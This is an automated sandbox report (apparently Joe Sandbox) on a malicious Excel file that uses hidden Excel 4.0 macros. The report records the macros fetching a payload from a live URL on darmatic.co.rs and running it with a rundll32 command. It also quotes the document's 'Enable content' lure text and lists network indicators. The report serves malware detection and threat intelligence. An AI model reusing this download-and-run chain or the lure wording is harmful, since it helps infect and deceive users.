Loading ...

Play interactive tourEdit tour

Analysis Report estimated (99).xls

Overview

General Information

Sample Name:estimated (99).xls
Analysis ID:353078
MD5:48e967d6fb49bad425f2a30e9397044b
SHA1:f173318107c6cb325fd1271644db2a394f993f69
SHA256:ed67c2bce3ce33f697d5d60f73f861bdba018cd71610e5cdcc92427263fca8a1

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 920 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2528 cmdline: rundll32 ..\kdfe.vbox,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
estimated (99).xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4cea2:$s1: Excel
  • 0x4df06:$s1: Excel
  • 0x36bd:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
estimated (99).xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\kdfe.vbox,DllRegisterServer, CommandLine: rundll32 ..\kdfe.vbox,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 920, ProcessCommandLine: rundll32 ..\kdfe.vbox,DllRegisterServer, ProcessId: 2528

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 217.26.213.91:443 -> 192.168.2.22:49167 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exeJump to behavior
    Source: global trafficDNS query: name: darmatic.co.rs
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 217.26.213.91:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 217.26.213.91:443
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: rundll32.exe, 00000003.00000002.2102166974.0000000001B50000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: darmatic.co.rs
    Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: rundll32.exe, 00000003.00000002.2102166974.0000000001B50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2102166974.0000000001B50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2102395229.0000000001D37000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2102395229.0000000001D37000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000003.00000002.2102395229.0000000001D37000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2102395229.0000000001D37000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000003.00000002.2102166974.0000000001B50000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2102395229.0000000001D37000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2102166974.0000000001B50000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000003.00000002.2102166974.0000000001B50000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: estimated (99).xlsString found in binary or memory: https://darmatic.co.rs/ds/1502.gif
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknownHTTPS traffic detected: 217.26.213.91:443 -> 192.168.2.22:49167 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
    Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet."7, 0Protected View Thi
    Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 3Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
    Source: Document image extraction number: 3Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: estimated (99).xlsInitial sample: CALL
    Source: estimated (99).xlsInitial sample: EXEC
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: estimated (99).xlsInitial sample: Sheet size: 4598
    Source: estimated (99).xlsOLE indicator, VBA macros: true
    Source: estimated (99).xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: rundll32.exe, 00000003.00000002.2102166974.0000000001B50000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal72.expl.evad.winXLS@3/9@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\10EE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD7F7.tmpJump to behavior
    Source: estimated (99).xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\kdfe.vbox,DllRegisterServer
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\kdfe.vbox,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\kdfe.vbox,DllRegisterServerJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: estimated (99).xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://darmatic.co.rs/ds/1502.gif0%Avira URL Cloudsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    darmatic.co.rs
    217.26.213.91
    truefalse
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2102395229.0000000001D37000.00000002.00000001.sdmpfalse
        high
        http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2102166974.0000000001B50000.00000002.00000001.sdmpfalse
          high
          http://investor.msn.comrundll32.exe, 00000003.00000002.2102166974.0000000001B50000.00000002.00000001.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2102166974.0000000001B50000.00000002.00000001.sdmpfalse
              high
              https://darmatic.co.rs/ds/1502.gifestimated (99).xlsfalse
              • Avira URL Cloud: safe
              unknown
              http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2102395229.0000000001D37000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2102395229.0000000001D37000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2102166974.0000000001B50000.00000002.00000001.sdmpfalse
                high
                http://investor.msn.com/rundll32.exe, 00000003.00000002.2102166974.0000000001B50000.00000002.00000001.sdmpfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  217.26.213.91
                  unknownSerbia
                  31042SERBIA-BROADBAND-ASSerbiaBroadBand-SrpskeKablovskemrezefalse

                  General Information

                  Joe Sandbox Version:31.0.0 Emerald
                  Analysis ID:353078
                  Start date:15.02.2021
                  Start time:15:48:18
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 4m 29s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:estimated (99).xls
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal72.expl.evad.winXLS@3/9@1/1
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xls
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 8.248.133.254, 8.248.149.254, 8.238.27.126, 8.250.151.254, 8.253.208.112
                  • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/353078/sample/estimated (99).xls

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  SERBIA-BROADBAND-ASSerbiaBroadBand-SrpskeKablovskemrezeStatement of Account as of 27_Jan_2021.xlsmGet hashmaliciousBrowse
                  • 217.26.215.11
                  Gnnqmiwn.exeGet hashmaliciousBrowse
                  • 95.180.119.24
                  wqCQactJ.exeGet hashmaliciousBrowse
                  • 95.180.119.24
                  Y3gAvT9q.exeGet hashmaliciousBrowse
                  • 95.180.119.24
                  SecuriteInfo.com.Mal.DocDl-K.25519.docGet hashmaliciousBrowse
                  • 188.2.217.94
                  SecuriteInfo.com.Mal.DocDl-K.22129.docGet hashmaliciousBrowse
                  • 188.2.217.94
                  SecuriteInfo.com.Mal.DocDl-K.13398.docGet hashmaliciousBrowse
                  • 188.2.217.94
                  SecuriteInfo.com.Mal.DocDl-K.19985.docGet hashmaliciousBrowse
                  • 188.2.217.94
                  SecuriteInfo.com.Mal.DocDl-K.17919.docGet hashmaliciousBrowse
                  • 188.2.217.94
                  LtMIugamW66s9DIoTLmG.exeGet hashmaliciousBrowse
                  • 188.2.217.94
                  AEbQncAjZzCurqxDYb.exeGet hashmaliciousBrowse
                  • 188.2.217.94
                  ekI4JFDOyRB4oEnH.exeGet hashmaliciousBrowse
                  • 188.2.217.94
                  cpT0cIwD3kZSu.exeGet hashmaliciousBrowse
                  • 188.2.217.94
                  kh7c.exeGet hashmaliciousBrowse
                  • 188.2.217.94
                  5H6ibt.exeGet hashmaliciousBrowse
                  • 188.2.217.94
                  rFdxWe3JgMeI.exeGet hashmaliciousBrowse
                  • 188.2.217.94
                  lnAjh.exeGet hashmaliciousBrowse
                  • 188.2.217.94
                  img00127.exeGet hashmaliciousBrowse
                  • 217.26.215.27
                  img00125.exeGet hashmaliciousBrowse
                  • 94.127.7.174
                  qzluTXww1B.docGet hashmaliciousBrowse
                  • 94.127.7.160

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  7dcce5b76c8b17472d024758970a406bdocuments (29).xlsGet hashmaliciousBrowse
                  • 217.26.213.91
                  DkELZjJtGY.xlsmGet hashmaliciousBrowse
                  • 217.26.213.91
                  DHL - SL720073066537TX(3).docxGet hashmaliciousBrowse
                  • 217.26.213.91
                  notice of arrival.xlsxGet hashmaliciousBrowse
                  • 217.26.213.91
                  DHL_PRG201123213594.xlsxGet hashmaliciousBrowse
                  • 217.26.213.91
                  selfassessment.docmGet hashmaliciousBrowse
                  • 217.26.213.91
                  selfassessment.docmGet hashmaliciousBrowse
                  • 217.26.213.91
                  P.I 467301.xlsxGet hashmaliciousBrowse
                  • 217.26.213.91
                  Remittance copy.xlsxGet hashmaliciousBrowse
                  • 217.26.213.91
                  Eur Swift copy.xlsxGet hashmaliciousBrowse
                  • 217.26.213.91
                  RFQ 2027376.xlsxGet hashmaliciousBrowse
                  • 217.26.213.91
                  TKL Steel Quotation.docGet hashmaliciousBrowse
                  • 217.26.213.91
                  SecuriteInfo.com.VB.Heur.EmoDldr.32.39676696.Gen.27336.docGet hashmaliciousBrowse
                  • 217.26.213.91
                  SecuriteInfo.com.VB.Heur.EmoDldr.32.39676696.Gen.27336.docGet hashmaliciousBrowse
                  • 217.26.213.91
                  Detailed #460988.xlsmGet hashmaliciousBrowse
                  • 217.26.213.91
                  Detailed #460988.xlsmGet hashmaliciousBrowse
                  • 217.26.213.91
                  PL + CI.xlsxGet hashmaliciousBrowse
                  • 217.26.213.91
                  Funds Info.xlsxGet hashmaliciousBrowse
                  • 217.26.213.91
                  JOLeiluXFw.xlsGet hashmaliciousBrowse
                  • 217.26.213.91
                  document_bundle_87762.xlsGet hashmaliciousBrowse
                  • 217.26.213.91

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                  Category:dropped
                  Size (bytes):59134
                  Entropy (8bit):7.995450161616763
                  Encrypted:true
                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):328
                  Entropy (8bit):3.0765536003145497
                  Encrypted:false
                  SSDEEP:6:kKymbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:23kPlE99SNxAhUeo+aKt
                  MD5:76BF865A1B528EFDA03260D975C0279D
                  SHA1:BB67BB40383B4B369C10022491B198C54A98863C
                  SHA-256:DF953B05638EFE7B4FBAE552A40DED1E6F15283DBB6A628E1275E3CB63C1C787
                  SHA-512:7750386640C6604E1A02A0C65C73717D55699EDB83BE04848AEA3D7D63C332D7DB0A00DB60EE99FA2F2996B91B9C229275BBD455AD6CB1009BD7C4BA1D0AD197
                  Malicious:false
                  Reputation:low
                  Preview: p...... ......../.Y.....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                  C:\Users\user\AppData\Local\Temp\8EDE0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):306614
                  Entropy (8bit):7.987362214455033
                  Encrypted:false
                  SSDEEP:6144:F+QrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+Msz:wQFPM8R3AsB+bjej/9cb
                  MD5:BC6FDD14EBEBE36A15F8FFEBC44223DF
                  SHA1:13AC3CAFC809ACF846BC888977CB088BE067623A
                  SHA-256:BEF62E812377C04103B58AE97DE93EDF795DBB5D09CEB74E8F6D88C86BC0DBF4
                  SHA-512:0F0075D3AAF8FD20AE823D6CF2C1D7C39536243EF0C8BA5FBE195E052F67E18437997D1809182A2EB6758E2525E5748A0A344D97DD2CFA9E4EF98D74C57DD5DD
                  Malicious:false
                  Reputation:low
                  Preview: .U.n.0....?..........C....I?.&..an.0.........,.\.Qo.7.pz.........7.V..^i......;.0.....Z..d../g..u....e}J...({........G+....!...~1.|.....)s....,.I...o..c...{Y.e"...Hd..;.#R..BKP^.Y.n0D..{.dM..&.x.)Qa..^...Mm...|?".....!......u.......r8.........Z..GXJ.....q9.~..'.aZ.a%.4%.......s..&.{txD. ....../?..........`.:nN6..?..XF.../>S..y[..r....F....1......!.S.E.u.h~t.n.9.....C......>...az.}@...^.....:...a;....."M....l..w..j.6/...?.......PK..........!.\lC.............[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\CabE5DD.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                  Category:dropped
                  Size (bytes):59134
                  Entropy (8bit):7.995450161616763
                  Encrypted:true
                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                  Malicious:false
                  Reputation:moderate, very likely benign file
